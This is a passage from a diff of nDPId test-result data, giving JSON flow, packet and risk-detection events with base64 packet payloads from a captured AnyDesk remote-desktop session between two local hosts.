{"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595407,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595407,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAABAAABAAEAGtfrAqAGywKgBu8tHG54tLA3cAAAAALAC\/\/97PgAAAgQFtAEDAwUBAQgKHE34xQAAAAAEAgAA"} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595407,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDlAAIAGAADAqAG7wKgBshuey0dV\/SLKLSwN3YAS\/\/+E5AAAAgQFtAEDAwgBAQQC"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGthLAqAGywKgBu8tHG54tLA3dVf0iy1AQIABwXwAAAAAAAAAA"} +01178{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01600{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} 00206{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":41,"source":"anydesk-2.pcap","alias":"nDPId-test","l4_data_len":3946,"global_ts_msec":1613977596944} 
05655{"packet_event_id":1,"packet_event_name":"packet","packet_id":41,"source":"anydesk-2.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":3980,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":3980,"pkt_l4_len":0,"thread_ts_msec":1613977596041,"pkt":"KDc3AG3I2MuK4S0uCABFAAAAdINAAIAGAADAqAG7wKgBstOUG56PGIGVWcP92VAYA\/6ExAAAFwMDD1FZ4hNO+msUnGzaUU1nlPykrkKoqd5IWa\/vA7eRR3EZWBPkhLgUG\/LhKYhOBCw1WETNsRkQ\/Njqm5X16glM7tI+xcqXk3+pstweoYW+cn9Gn62XhRf8R73HpNP8O90ZrBr9CegI\/VdfYrSOHPhA2e99E+0j4+VZ\/OWFINBvKkj3BJnfIY06LJr7sGJtR+dAQOwICx8D4\/W7388S52uXl0lL2KX7WyKVvleG6T8fiXMQLVolTazIJs4yZw9hrrazGCRC9Iqdm+H0azjBk4m3YV2OMKP54OCS8dUcnak2O8dvImZ5iKslxqv2hokAbqvJMaM8mhVBXwGF52ctr4Cwnw77hzC+mSW4bmrp4Tcg5MPiRw1mTQ\/3NPawA+Zq2rxYSvhk\/u9pX+e10AKM2NMlc+XUfDUnwHzrihybSEsYE0XQlkwxxyc+9H9J8YsAbL+BW7EjTLB1jeSl5z2MVP12e9NNW6MZhJjwB+sOhJ+fNX0c\/v9peT6wkv\/tfGsRdmFlHVNXdzWn0O8KPkjxVcY8HmLnhgEm6RUAJURSAsF3ExMd\/sG+P\/mU688tcA+RgLosPwl9z5uDAuz9NZCd12HIAtb95ZBP9rAEaxi82tNAqOYj68rFfzNf\/RpYJfDStItU9FV3A8kHsKEGkFmk4wZ1tfIEOtfaaKe85y9pH6KiteXJy5jBBJnmRZTq3hdyxERiq+Tgi+PIu\/MNnYR6l1Pqrms9rI\/EVyNKDYzOeDBTR2B4i8xQUojiYfz8udZp2jaWACNjoGW1qrXBfIZoN6McfX9bXlxaVklg8xVW2G4CKsbb8dOBkttzzZK1dsazFK18wuUY3+V6Ukg1i3Y7Vlu6oV8qYQjVWhwNKWHFFQz6TJ1f7KJB90kDzgVnWYYn3TfOxejwLeG+nRzfrXzulo72CElL6Z\/lG\/4p+l+2wUPmPUXnPCfsAazCunsNe\/KXGVNe16AsL3LO1LT6UMDW\/nYelajX1pVTfya\/e\/g3PTYERCzcbFUt4y7zrmFbTnT4lxvHFvxanm260ljGYOP06b\/vWg+4pWLrQNkWA9MTICzlcpF\/Wmidlj0qfi29KJjQ8FUqg5l5XTfqACYhtKC63DrEESjMa46mYX5whiXYX2KSGQGVD+QvD+zhP\/CtBWeSzuMorWP+vcKHB6d86IQSfd6cz8qTUxY8QCZj3ANEPGpf51oIB2bip2d1OUvGIxbkaKup8u4V60aDmH2PiICJH7ivyV6sSvDty0QVNDKnid2wk8iOXEnChUfGO5mpd+vrzlTK6CD4G4+lV\/by4D3sFE2TznnhMG2zFDfGeHQM6Wj8gm8KTfbN+XyFgT4o3Ixk+93DyzX5mHvlurk+pBQBuQ9ppDbIH7HFD7iUZuoLbfUqyOgSKk30XQutoXEK7RJmcYeYBWd1LzTpXP+N5O5yfEDTBHxskC82ltKt9sAuTc1sKTSCwKaKWO1X\/efVdDVsf6PBKNtWizrLEymaYbySEtGfJmMlB6uqJtfUm27qL5ujDZ9mIHM3LMDyrXtK4KlpdB5iI\/euSzqF5fQqGYeXiGJN0S41Eb1GzBVvFl0s3aeJb4QFn0CJSOTsL6GyRbOkT1a0vLdMrPBz9u6BivhEd+Z
LHaRV3+iJKbIcXbXR9lrCbTCrjSVY49HI76N6tDFWvse7Dr0bXXYFqqkOjweEf0JSWOknOhym3HAWiuHVX+ROnUrPCbEeLIpp8zL9GGOTk8Q2mr5Spw6l4rc37QDj2M6jtgkezE2X86cK+oDpDDOIVj+F1pGcC4UnUPTK3scoEmHGH7LkKEd5RDRudiwg7tbKcGUP4BwRqmS2Gi9LKpIBXdtqiZPGwomBbzdlo+z0RHOWr\/up4gl1dmUxQF+tDc4oHMCMi1e8zspb+grjhj6EezTHv3ji+8yN7mdzS+Gkbpt7QlBarSoY5L48wl08+ZBvrukp07VUSwQcfAn9S8NB43w8+z45JDDrveYZ28KVDUxo6GQB3B0xG4JCzoWvRhSPRa7ni7nu9Gszwc7tPJ9xiDAaAq2gfthjMseLUOdGDz0BISGCxKHZieN864AhI1py+AEI+Htmrh10CW05qpzZwVzz2VFECGzsx3x0C\/nqnxrOECzUm0dPJrMExdTxFcgoqXF011yHCSzXtxwC98icS2pusV+yTjVIhj8CfW1d+8fVhOArSXi3lMMFjUTzDLcJtssGLQ0cjVYbimvwLxyXqTRGVzWkuGVPh50FIqPQeJG1RhCeW0kbFVm7W9b9H9S7klEciP16ZhaTmVvfTTgYqrR2ZJmHH2I61Ib8cJwB7qC65zRSXnWLdZs\/TuFj\/TxT6UrRcMpV1vvOYjns3Gz\/dowyWU9MdFg1sBuoUzdYhOH+xh0gjiOiFR+OmO9yK3di5u27XLW1hOtpPgG+VqRkjURJs2X7eYc\/nVFim9OR2M271rHHTTGmofiA2qRYewVfivK4+jJV2algoPfe78BQVj0lYL8HSL2ZIOVwb7WccV+mHgXVjcaDr8VeGILburQoLgZ3L3Rh6dBmFRFNDAM2F5UvL6rcbC48HPxdFN16gQFsf4yKqOfuTQa4qvxxMeVacwMBH8TyGwIqHd+Tu1k9SeZW9JzAKZNOepT64wLCYsAHDNfrvua7\/DM3Er3\/3ogYsTLe+cEnrJEF0jzT\/pW3BeJvaGd27aJYiI4XXscQqB8hOAXO5tAOPRO2w7cv7WHSnJd8ikF\/boKhx3DSbhEgqQliEpDTKXvGDhrGJ1aXzM83ENzYdrp3w\/qh\/Nf3lFU96DuSvh49grWDQkMeDDWWwXeT35tZD\/9i4Y5fFpZIV6SuRwn5p+R9aNHdnQ\/kTb4S4uHdPEUKPQjKs\/yJMUGcPxicPpB\/EisjPsJJbm7W1mTHU7MIIM\/vWf97H\/qvxLJ4+6dpF7eBxBYIXZp4vqqyNXSe8fXlScBOjZ7KGFq3h5Lsv1iilvMraMq1ISyI1SMlYMJGCypO+r7ZEXKXhAC9eCXv97ngQmCSfOC8yQy0BHfYcR\/GagdbDhHp52TBPv540aa8roHZiDYWEAvRy60ik6jCvbpXWcGapjEPyt9GESjgevqZXh4ByQjZeQa5WOr7Cz5wUS6XJhwdm1wGwlzD8KaiSP5C7Dw5lq8A3RtUTSDSCTiMVWNgdjSc74MQ1jk1g8XF1QA5oCCJKcd6baWRIcuCXGejHzwU++HX+sLNBXpzgm6BOkdcw1rBrXndG\/g9wtAODPp1NIebGIUBA8bwWYJXy3f1MwWV73BLyP6xUng2u8pwIPJ\/w72lzBfeximEN581Pmbzit7uC+88wlAlAmE13UPXh2L6jM7HCsWpxaF79JpkSrnInn8vub5LDlOlRQ7oild8fQrhrbGarKIIrNCdhLZ5aouS96b\/KyopW16Xv2Rc9xFrgSg4ci2RYHCemJZwYuTROMsSoM5X52hZZrrjU0vBuzfjvVO+GgDyIKa39Yoeu51MP+qfWqjdDBZ1wgSVjTNfz3TIE4A4KMb6Cl63\/6TRFZUpnIyceUMCe2IP0kvk+YgXulkcSi0emPStQ4WpWgV8klz3n5cpS0yt5Idvkv4l6FdXHq3kxH\/XTM0niEe1M+4lFJR
aB7IvrjklA67KYKUY8KCZs1yVLV3iBzYHV5q5GSPmymAagTbSS0ArTqr6BOKPdX1u6z4BG07x613PW2TE0ODR3DvxyFC+10nNZR4enZpsOrMGbqDyW9yidkPDpiZBhlp7NXIKAxPzV878YoFs420WX+nCtL2rHv69VOeWflwR0tlbrBYDRasBj4Ozy\/MWHHB47HxGgEI6rEo7Bj5A2l4qkAQCBvGYxXrIir5l6wMCH5LO77vM3yVRBZzAmxfDBn1PMfrss3MsnCyKM82azzo1KByvjM7tt+seSzjL4zKeYnBAxt+gpQU9gpBmPO+jlfaa9EfPfXktD24k\/Au+q4dpgZ1kpHdHuNvbEoLWf4GbGEXFcLbRQ85jia+McSrUdVt+gCMMtB4Z9SCaHAATa2UM61MTkweYPjRngskZ+R0ZbPdiORtd\/SbSRFFhpzIJQz\/AsvpOkr6s5utvDByWbKYa8AqQ5Aykc6oJPNVOD8KWUse+gAsIa9vlmRZ2iuMVUUTUHOCazB5EZoseBAlmJ6oc\/B7nctTpL8LmbkTXwj68y1leVMVm9D7vjM0tFwFKja+2ONbRpfRIA0sktOr3ZvqxUJGcKVycsKY4vIDIm5kACo\/TDsPHtL7PoN4CClvCb8kjCdjOHPLu5cD8\/KrvTkAZQtVA9VWz5+hm6Mn+hLgQ7KSw+5NALvBMuWC6ovDO6koaEtI2D2rO5ztN9to\/hy5AEOOCwgnKfOrVYxrml8DM25Ysz0X38zW4Qz+G8fq5qUeDUSWUU\/IZSqDcQC8mgi3n5p\/p3YhvfkfrkJ6vJ6nVIZUWJz+bMTfErsyHKmeoj9Msh7Aw8bNmpqeGEZ8xu1teQ+exP9+TZQWquTpbn2wxK+\/5ziA7OY65TsT44gP6mGlwQXUAUkahCLUd7kfyBjIF5qBtrkbgi0KWQKd4ZWhuLu+o1+dEax\/z5uTA3urCjHPw0CaCWul6eJRh3p18p2GsUeY4YB9AMOs6obyiagcUi+oA8XKl0J\/kC\/2EFYc\/HIECCxc1R5p3Gk8JuXKm8r2pNgmzqVHeTbatHsxapPWERfMh+XtO+ldcvlOBTbgmWeBcfYHu\/js8wOgUStGstFxbu2OwXllx7VU5MkxPvRFteV4cLNjNG+Id35MmSnXrcEEbVEy9p5gZyxXyq79oDrnZ7vw8\/SKfhclqXWwkXIN6Akam13SxsIVdOq6NRuhb01xYXSgIxM7\/qsEwNyCKMzME+EsFyX75nzo4KlkLJdg1M+SYi8T9Ap2MqlAfzWI\/v2YvtEkM0hvK5LqtBgjXdhrrI0roG4RmfJlj+Ll72KiZd+UDQij1bY4IJW4KPauCJZxtpa2lYjenAgTHYgVFVhcxwH6E2QRwdKyyOCSg8BGs+6dP40kQS1hBBfHQsZjaJFUIaEDwoxe8AsdTjTJMdJ+GmcOB2KxLQXTaPKW6EcRL9RPDlWxhV+b5B2wd2Xe7ELG4B8qwKMuIQSfGNkahaIGKLVDksKlHnHebxupiKOsN4L5M5MukkAhKJbldgHZVeYxLih\/FbNPzwMXZ6WJV2P3OausnccFHvzYhRmiN2BsLGpyEh7aonio8QblciYgEQett8fFtbOAKB5idHPPMJme3uSPo25PTlsI4AO8="} 00206{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":66,"source":"anydesk-2.pcap","alias":"nDPId-test","l4_data_len":4158,"global_ts_msec":1613977602724} 
@@ -898,8 +898,8 @@ 02465{"packet_event_id":1,"packet_event_name":"packet","packet_id":2511,"source":"anydesk-2.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1615,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1615,"pkt_l4_len":0,"thread_ts_msec":1613977618195,"pkt":"KDc3AG3I2MuK4S0uCABFAAAAiTdAAIAGAADAqAG7wKgBstOUG56PNprJWcRUSlAYIBKExAAAFwMDBhRZ4hNO+msXhlYwLW3r7Wf6fxRwlnWsYmV1WuMmbomyRakhOPMItw4V+Bwe9c2kioNcoKfHSWYqqeTE0ksEvnbqcFDYrid1VrjOOjcB\/nDr1c6HLfTQ3QEJ+Lm3fUR7zGIoAQ20zm9sQuwh0owamzzcAZywgeryapRfhPauo+S3t1P6mAQJVWmQ48\/m4laoXCHpx\/ZNXM7OGlpLxi\/GQ8e0cJZKbOpdXoIavUAWim5AZib4XY4litUKtw4uWshG5QPwWaUM3Ae6cz4D6CHe1pqPJC1PHnOmoJf5zYUg8KPhyov\/VN+rFTCbG8LCc5i55m0UDUzi6HlDdA1\/um7ZW442jB6ekb1jf90bfj9J8MvGM+090gB\/kXjCbyWhMrL2DGjF1CnqO2XHEafShcUOcIkiODG38mrxp8HmyusfYW6rowpNIJnORNMONHHZbt3ayv\/4z7Z78J4iS0derQB3do+weMeQwvbqwCPKiG8HO\/My5pAhxZ+o+I9I2N9ae4X\/Y8ocpQzKB7UbCm33gA7ZKtGwp7hY5YDVTThQeofIBnnETAVcInayA1wEq9gzcjRWDzj65fgvgfC7bB7JGd8S31fOCYiB2C63dEN8pSUcU+zWvjBnr0yNDH\/EkdjjmHsEO27b5wzXb7nVEX4hJTivJz4gw4o24bftDjS4zWx60B6U9i1vyzDDxitDWw0syEsstIpaURjH7ITxa3j2r+Nq1ff9t5sYMhNTW1zTV8ejXZXGpcyKHnimylgLOExKqaUoPs16P+gMXU1GoI\/QE11V6YNOdd8IOEwfXDhTFoNhCeHMRJIOEzjnsXX3irYjMNbjsCLkkdlo\/nmoAZRRbXIP8PR0DTaNKVCvH\/lBUmaMtmedJixVqqmW062iw3kPZVBh4lYRL3jomCTu5FZesvQteJKNV3Y9Omt9+GTDIzlVG7zGyTcep4kvQZ+Sof0EGR+uV5xP2hazfvAz8bw97Dmd26aaaPR2WZIF1Uw+gGTwUwycAm2HqwBMk9KpiHOG3rT9CRBLDozpd3poBCJuMzVqYxiRw1YBNMFVnCO72mFgH53hHmJTq1CuUfqvIlcxkXFRcD1hsNPoBeMkC+gANksenOjfj4QgnxGFkLSXfYz7QAFchs27aWCjwTDiL2hPNRIFMhowA3TpiZOyPOk1j7P2qbmqZS2RY+Wg+Xr8G33bDwQJjOvaNoQoQyrMw6Km4P5SULr\/OoUfKqTYt8sacsFFgE2dhFX0aLmCR6nfj\/qavtL9bRKEw7331Hs8YJudmup7h9GKKnTwDORPRpBZbTdPW2pLXPpGMrITNeH8Czvvgrr2lAzsrODPWTSvUxAh2Sz5CcZbfx\/EdeHpFfCb1FoYkhZVl7ezj6yCSrZx2416BPENSMorhwoqdOcsi0RX5Ko3gKJwgGQKCkOa3Y0U8YcQSyWkfspdvGj3yxoveY2XqaLegd+qhmlB6N01PSLQoRemcRbyXnyxGr\/viRnWKQzZZPgg5TK4govdljpGh5dEn58vUYSwcKY8WhCjIzXrUYvrwQK4bE9HWyXw01GJmzdskpPgwYEzXQes\/tei\/r\/gUNhca777WhFTPj7c4vuisP\/hv2t
OmFJDwXxgo15XcCi1ewFXlapQj2HV+tzOlUmBYwgYK7uFPfywo\/1wliiixPUz\/xHDN\/qGbzonHbrNJyXBEThhvK7H1on6XYKBCxUkx20ivR2AfZ7rojhDTeGD1othoXrjyHmj9rz5O5kE85xR4kAd6B40PTbS2D3FCfDE0r+S\/Y0coeGWLkUBTq7Mldu8aosM7O+tiy+nq5Ia3VGBq4NueTbqxQEj4\/FXfKJdTDfYicstfUhtAv0hpUILpFNfs+vduW7hyb\/6EsKXtoi\/PDM45oQJRdBmH34HpYyIYxnAy\/voJip9OCWOtW6uugZUHWyjl8MC8UGZwP0Lg32K2WtshJaLkBRK4jTkSjp80e6d\/CyeKZCTvZGOA1WpiFYxxn2IsKaToy5iPEEifX5xFRC8L8mqCJWZLWdbIKC93YrUmoQVxHMjgz6VhN1FantUqJ9VC0oAD\/1ydh9UtojQUE8zFGj8Vw=="} 00208{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2513,"source":"anydesk-2.pcap","alias":"nDPId-test","l4_data_len":2146,"global_ts_msec":1613977618195} 03224{"packet_event_id":1,"packet_event_name":"packet","packet_id":2513,"source":"anydesk-2.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":2180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":2180,"pkt_l4_len":0,"thread_ts_msec":1613977618195,"pkt":"KDc3AG3I2MuK4S0uCABFAAAAiTlAAIAGAADAqAG7wKgBstOUG56PNqDiWcRUSlAYIBKExAAAFwMDCElZ4hNO+msXh2bUnODOizPQiAddzId5s0L6Tw4B2tyJ0YG6Lk9xeCjCkk5iyV\/TcZ+MkCeyOMxeyKngR\/0L81CbJvcp2HY5+PJ99RjORMM0hFqL0M9FsClysAMVqzfPzL0uTI+AMuQYjmp2qqS3n0jD5Mc\/OI6AQf5alcy5blcc+SRlMpLpNTjaoZqhbqyN2OjZAQ0RCghY1jgDpcpPpjzXwFfM+eUtNLtomqzUozUMvSGBCPubR8ysHpKf08rz9nQsYe\/eQy1W+fGZ3UevRU4e0ziP\/Z4ImlVCjTNEZ4Q1m5e1dfxc\/2iPO\/xRUkfR9tTq5C7ck1L6BG5Sbs7srBImqkQCfZO0borStlxpNfdnOV3FAeKPjPu+OB0GQFdSoxU3ShgSCS+s3yhVPiImHbrFfcRtfPcymodIF1QSeUI\/b4QvFBs1xUsetwKnOpQQqQSJnJmm5p8kAXEr+E17QnDNbQ7YpszC1yHmy8ntEIl3A784f8yXufRNOYJFir+O43BaD0qfe\/E8ybQFEb\/wMzNxH0PbiaGM6fZuRxuetCSAU5wDWUE+emEiVkHNdRsVQGRAbJoutoRZnkFzwA6CyosjbLdzxuScaUYQtz\/x4oANzVRMAMzmVJ4c5nalbJW8JxLGB5MZQ9JCVYtUqHLLUdCfyU4E4HlGdK5rNarSj3ruUr+\/5kCGel2xiNIDS+c9xxjT8sS4zj8gfHVq5EP7LPuFyWrTkRmqr600UXyM+yqOFXwyU43fpvj4RXm\/bDgFfkcz2MeJFCky7zPaaOAskDznNnLRmqzyBHEcnqVNwNVWmZnSPzmAPX1eSxSk78DEv\/4pC1Zw33pmGNtPqwzbm4adGRSJMpXA1ESn83MO5nw2tlad\/f6XtHIDIIFcAd2ybubKHggF1GlVj0fZ3rkpkpXpbeP4HjV
WCmpZlmt5hrqOnYKCXIoA9d5Q9eU9x0bDgEw8UsAs8Z2cGt7PGrb+Qv7bmsIIrtbYJoehXXLytxGqTyGFHgdtZ1iR39hZ3t83j6Mygm3lc680av6XxYpuCod\/9ENBc+yDd51\/4a1SVvyKfKpS1J1NPGkdCHXxqze5lGusMv4rpLextd++aXgXm4pp8tC9u7v0Y3ESoZOdsgdZjwRtBAwxPUuMR+bTiGlzmFAWnBxEgtA8qwqoeJ8fN2BBhxRSoyiJIjvIbrD\/ViWh8M6a5vCi9FaH2BHmTSkUujKoS4Ui05Uf0s+HwGa2T\/ncn+QF0sBjLTpC3akoGTkw2dqmGtGGg9JL9sxQrC3Z8P2+K0kklga\/87NYKb1gwl8HI5zrx04BnBtRZsYBSRVsc1GywvAc13NndpSo5neCnmnBd\/1I9+HIxUef4wi7p4C66Y0I2booJeN+ZoBGc\/1Y4vtaXbEsPJKJMDqB+BLCw0nSvSbDYYxB91phOhOel5GanFtMg+9nyM\/3XGQvKxO8noAo3CMoOyP7NgQIfjHvFH8Bz6xZMI7QqDGNnOF1uX5CACJ7YsOw8FPJLyQlYtZFFGiMTTrapto3gMpziUDCXvss50gfevS3poRlxl+s6OS85vpXalhuTHFjf8vGxSXfWFquDf1RFg9CUy8zk9PSl1vxgrx0OTqElj9oGT3+Vx3qZgn2bqf+592wbJFWx25hJrBNvBVEbn+OJNrZuuEh1HCoz98Rw4ULrJKM3qfOdDRZ2usK\/f4PyleqeEhwP7aUVZX0wKYFXL2UxfGiK7yY36SpPBq3Ln32t6dvMpaObtqNj+Kfr4ImRxmqQhe0B5zTHV67SrOYPC5E+e3BuEgNN6g9Xu7lBtLjFEUVfT\/s+OSTv0ASorfZmSXHEGDDlch1PtzQNW9Rg1xFAIoMDwxtBj3jiKEIJKWJ2FNgC2FjB+FshqIdc1deJTLE2ymgSABs\/nFAcJERH5Eh8SDc80l1fUqtgee0KKG7+UiEYG9HBLhxrjLYpW6nqwKOnP5iS5J75eSdcaJPQ2RCDoI48f54M\/u0C5mjF4KxZWfbF6W+LA7ItzNMe\/dXWOBsTFS8qH5T20g\/3IZenJtIlcn5ix8kqRSNhmkt78WK6PYEC8Frnz87GbQ2+TF1AIO24YEByT38EkpPfVZBJEKa7vsROTk\/wrD31hqsKtZVqrDC7NcjVOE7GiftEXF+1sA8Yo1W\/gcl71x2tP6c6oxG0OS7vSR61oZ9c4wtxmZsalZYl9wvy0wjtzOgCqQPbk69W7bNvn1ZXADwPJ8YWuzH9z1aPWM2csOqghu72ChTMW2zQtB\/qGY49wPVNjYcmbEB+443LWlsFCjcunDLVmzxVAIJIet9kbYse0PhUurR66Ele1UdzzsBsHU08\/5dPnbKk+8hDJCPyIztDNktODA9+bPmDu8JJ2UixUjK4TEzkxYFIQMx0hR4gryqlUJRl1sbbMr7VctjZdbpqLiiFuSagY+pSdIQ8GPFcdtrfWsXnDYoiBXJ\/5j+UKyYU4B2pUY38w+mhHW38VyltT030eEtueb0ipynzmIgzRdJZ\/W7TPMibiy2oykdpbb6SZ1ujx16jzA3iU7pPElUkIOkKOSxtREPgbzIlknPYKGoBQHdq0GpxSL0i9d7GU7NtI2fcQYpwP4X\/sj3JNdosmuOXAeEPYsSMWQmH+qrj6FSm9gE+WhZfWc2hGNRD7Y6OGdYaU0Q60pRVRul0FACZqyMrb5y97MpVuuqRxKzn2r7P+Z+KtgKO7S7rNMVQmOq0tVktiH\/Ws836Z6\/328nnzLauw2NXRu0qwbtytvVv0f2sBuTbqbURJET4ciDSSyF7wux7TlhQsY\/qPPlXKBUkVGHetfK0nSty5hsQc12nShr9kuLAog="} 
-01300{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": 